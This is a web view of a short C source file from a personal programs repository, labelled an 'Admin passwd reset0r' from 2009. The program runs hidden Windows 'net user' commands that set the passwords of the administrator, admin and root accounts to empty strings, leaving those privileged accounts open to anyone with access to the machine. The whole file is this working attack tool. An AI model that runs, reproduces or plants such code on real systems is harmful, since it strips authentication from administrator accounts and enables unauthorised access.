docs
[mirrors/Programs.git] / c / adminpass / adminpass.c
CommitLineData
84aff5c8
H
1/*
2Admin passwd reset0r
3Harvie 2oo9
4*/
5
6#include <windows.h>
7
8int main() {
9 WinExec("net user administrator \"\"",SW_HIDE);
10 WinExec("net user admin \"\"",SW_HIDE);
11 WinExec("net user root \"\"",SW_HIDE);
12 return 0;
13}
This page took 0.199855 seconds and 4 git commands to generate.